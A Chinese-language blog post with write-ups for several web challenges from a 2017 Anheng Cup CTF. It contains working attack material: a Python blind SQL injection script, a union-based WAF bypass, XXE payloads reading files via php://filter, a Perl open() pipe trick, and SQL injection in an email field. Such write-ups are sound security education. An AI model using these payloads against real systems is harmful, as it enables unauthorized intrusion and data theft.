Sky's blog

安恒杯Web安全测试赛秋季赛部分wp

Word count: 1,414 / Reading time: 8 min
2017/10/15 Share

噗噗T1

访问http://118.178.18.181:57016/index.pl?file=index.pl
即可看到flag:flag{flag1_song_ni_le}

信息收集

直接敲命令nslookup

1
2
3
4
5
6
7
8
root@sky:~# nslookup 107.182.177.34
Server: 192.168.130.2
Address: 192.168.130.2#53

Non-authoritative answer:
34.177.182.107.in-addr.arpa name = this-is-flag.

Authoritative answers can be found from:

得到flag:this-is-flag

元数据存储

题目说了Mac,所以猜测是mac的文件泄露:
http://118.178.18.181:57013/.DS_Store
用HxD打开得到:

1
.s.h.o.w.m.e.f.l.a.g...p.h.p

访问http://118.178.18.181:57013/showmeflag.php
得到Flag:flag{lihailihai666}

一个盲注

题目名字忘了,我瞎起的,直接给脚本,题目很简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
url = "http://114.55.36.69:57012/"
flag = ""
for i in range(1,50):
for j in range(33,127):
#payload = "admin 'or ascii(substr((select database()),%s,1))=%d order by 1-- "%(i,j)
#payload = "admin' or ascii(substr((select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%d order by 1-- "%(i,j)
#payload = "admin' or ascii(substr((select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA=database() and TABLE_name='user'),%s,1))=%d order by 1-- "%(i,j)
payload = "admin' or ascii(substr((select password from user where username='wangmin'),%d,1))=%s order by 1-- "%(i,j)
data = {
"name": payload,
"password": "1"
}
r = requests.post(url=url,data=data)
if "密码错误" in r.content:
flag += chr(j)
print flag
break

解出来用户名是wangmin,密码得到是md5,解密后也是wangmi,登录即可拿到flag

babysql2

题目给出了源码http://118.178.18.181:57019/source.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
include "config.php";
echo "<center><h1>Welcome to my site</h1></center><br>";
$id = $_GET['id']?waf($_GET['id']):1;

$sql = "select * from error_news where id = $id";
echo "<!--view source /source.php-->";
$row = mysql_fetch_array(mysql_query($sql));
if (empty($row) or mysql_error()){
echo "<center>no content detail</center>".mysql_error();
}else{
echo "<center><table border=1><tr><th>title</th><th>Content</th></tr><tr><td>${row['title']}</td><td>${row['content']}</td></tr></table></center>";
}


function waf($var){
if(stristr($_SERVER['HTTP_USER_AGENT'],'sqlmap')){
echo "<center>hacker<center>";
die();
}
$var = preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var);
return $var;
}

关键过滤点:
$var = preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var);
绕过bypass:
http://118.178.18.181:57019/?id= \Nunion select 1,flag,\Nfrom flag
原理上实际上是:
http://118.178.18.181:57019/?id=null union select 1,flag,null from flag
所以回显上可以看见content一栏是空的,这样既可绕过waf,拿到Flag:
flag{7cfa7faeb83602f86b882bf511faf225}

噗噗T2

同样是读文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/perl use CGI qw(:standard);
require "flag.pl";
foreach (qw(ENV BASH_ENV CDPATH IFS TERM)) {delete $ENV{$_}};
$ENV{PATH}='/bin:/usr/bin';
print header(-type=>'text/html',-charset=>"utf-8");
local $file = param('file');
local $html;
if ($file =~ /flag/i)
{
print ("not that easy\n");
die;
}
open(file, "$file") || print "error: couldnt open $file : $!\n";
while ()
{
$html .= $_;
}
close(file);
print $html;

payload:
cat '/var/www/html/fl'ag'.pl'|
Perl的语法是考察点……emmmmmmm

readme

拿到题目http://114.55.36.69:57018/
判断应该是xxe注入
于是尝试:

1
2
3
4
5
6
7
data=<%3fxml+version%3d"1.0"+encoding%3d"utf-8"%3f>+
<!DOCTYPE+xdsec+[
<!ELEMENT+methodname+ANY+>
<!ENTITY+xxe+SYSTEM+"php://filter/convert.base64-encode/resource=index.php"+>]>
<methodcall>
<methodname>%26xxe%3b</methodname>
</methodcall>

可以得到base64过的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>XML</title>
<link rel="stylesheet" href="./css/bootstrap.min.css">
<script src="./css/jquery.min.js"></script>
<script src="./css/bootstrap.min.js"></script>
</head>
<body>

<form role="form" id="form" method="POST" action="index.php">
<div class="form-group">
<label for="name">XML</label>
<textarea class="form-control" rows="6" name="data" placeholder='
<code>
<body>Hello World!</body>
</code>
'></textarea>
</div>
<div class="btn-group">
<button type="button" class="btn btn-default" onclick="document.getElementById('form').submit()">SUBMIT</button>
</div>
<?php
error_reporting(0);

include("flag.php");

if(isset($_POST['data']) and $_POST['data'] != "") {
$xml = simplexml_load_string($_POST['data'], null, LIBXML_NOENT);
echo "<pre>";
var_dump($xml);
echo "</pre>";
}

?>
</form>

</body>
</html>

于是读flag.php:

1
2
3
4
5
6
7
data=<%3fxml+version%3d"1.0"+encoding%3d"utf-8"%3f>+
<!DOCTYPE+xdsec+[
<!ELEMENT+methodname+ANY+>
<!ENTITY+xxe+SYSTEM+"php://filter/convert.base64-encode/resource=flag.php"+>]>
<methodcall>
<methodname>%26xxe%3b</methodname>
</methodcall>

但是直接解base64会有乱码,所以写了一个python:

1
2
3
4
5
6
7
import base64

f = open('./base.txt', 'r')
output = open('./flag.php', 'w')
output.write(base64.b64decode(f.read()))
output.close()
f.close()

然后发现得到的flag.php是混淆phpjm……
然后花2块钱即可得到flag,解密网站:http://www.yunlu99.com/
(如果你足够强,用debug或许也可以)

findpsw is ready

访问http://114.55.36.69:57014/f1ndmyp4ssw0rdnineverno.php
似曾相识的网页……然后发现有源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
header("Content-Type:text/html;charset=utf8");
include "config.php";
// 1.sql
if ($_SERVER["REQUEST_METHOD"]=="GET"){
echo include "tpl.php";
}else if ($_SERVER["REQUEST_METHOD"]=="POST"){

$mail = mywaf($_POST['mail']);
$sql = "select * from users where mail='$mail'";
$res = mysql_query($sql);
$row = mysql_fetch_array($res);
if (!empty($row['password'])){
mymail($mail);
$output = "新的密码已经发送到您的邮箱$mail,请查收";

}else{
$output = "邮箱不存在,请重试";
}
echo include "tpl.php";
}

function mywaf($mail){
if(!preg_match("/^[a-z0-9\s,\-']+@([a-z0-9]+\.)+[a-z0-9]{1,5}$/i",$mail)){
$output="非法邮箱,请重试";
echo include "tpl.php";
exit();
}else{
return $mail;
}
}

function mymail($mail){

mail($mail,'flag','flag{***********}');
}

随手测试了一下上一次的payload:

1
2
3
mail=' union select 1,2,3,4 -- @admin.com
回显:
新的密码已经发送到您的邮箱' union select 1,2,3,4 -- @admin.com,请查收

随即想到自己搭一个邮件服务器,然后即可收到邮件
于是使用万能Python,链接:Pymotw.com/2/smtpd
代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import smtpd
import asyncore

class CustomSMTPServer(smtpd.SMTPServer):

def process_message(self, peer, mailfrom, rcpttos, data):
print 'Receiving message from:', peer
print 'Message addressed from:', mailfrom
print 'Message addressed to :', rcpttos
print 'Message length :', data
return

server = CustomSMTPServer(('0.0.0.0', 25), None)

asyncore.loop()

然后在服务器上运行此文件,再将域名解析一下,即可收到邮件,获取到flag

CATALOG
  1. 1. 噗噗T1
  2. 2. 信息收集
  3. 3. 元数据存储
  4. 4. 一个盲注
  5. 5. babysql2
  6. 6. 噗噗T2
  7. 7. readme
  8. 8. findpsw is ready